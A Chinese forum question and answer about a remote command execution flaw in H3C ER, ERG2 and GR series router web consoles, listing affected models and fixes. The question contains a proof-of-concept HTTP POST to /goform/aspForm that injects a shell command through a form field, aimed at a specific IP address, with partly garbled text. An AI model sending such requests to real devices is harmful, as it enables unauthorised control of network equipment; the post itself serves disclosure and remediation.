H3C多系列路由器aspForm存在远程命令执行漏洞(福建20231218001) POST /goform/aspForm HTTP/1.1 Host: 183.196.101.98:9090 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 1014 3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Connection: close Content-Length: 68 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Referer: http://183.196.101.98:9090/user Login.asp CMD=DelL2tpLNSList&GO=vpn I2tp_session.asp¶m-1;$(ISS{IFS}-a>/www/test); 访问http://XXXX/test 该系统(IP:1 13.14 0.31.10,服务端口:8011,URL: http://1 13.14 0.31.10:8011/userLogin.asp,使用协议:http) 疑存在高危漏洞问题:漏洞名称:H3C多系列路由器aspForm 存在远程命令执行漏洞,编号:福建20231218001,漏洞类型:
(0)
最佳答案
H3C(新华三)多系列产品存在远程命令执行漏洞,影响H3C ER、ERG2、GR 多个企业级路由器系列产品,该漏洞是由设备Web控制台某接口的逻辑漏洞造成的。
受影响设备版本: ERG2AW-MNW100-全系列固件及其适配设备、ER2200G2、ER3100G2、ER3200G2、ER3260G2、ER5100G2、ER5200G2、ER6300G2、ER8300G2、ER8300G2-X、ER5200、ER5100、ER3260、ER3200、ER3100、ER6300、ER8300、GR5200、GR3200、GR8300、GR-5400AX、GR-1800AX等。
修复建议: 1、升级设备固件至最新版本:ERHMG2-MNW100-R1122 及之后版本、ERG2AW-MNW100-R1113及之后版本、MiniGR1B0V100R014及之后版本;
2、关闭H3C设备 <远程 WEB 管理>和<远程 TELNET 管理> 功能;
3、做好企业内外资产排查,将受影响的设备及时下线或转移至内网。
(0)
亲~登录后才可以操作哦!
确定你的邮箱还未认证,请认证邮箱或绑定手机后进行当前操作
举报
×
侵犯我的权益
×
侵犯了我企业的权益
×
抄袭了我的内容
×
原文链接或出处
诽谤我
×
对根叔社区有害的内容
×
不规范转载
×
举报说明
暂无评论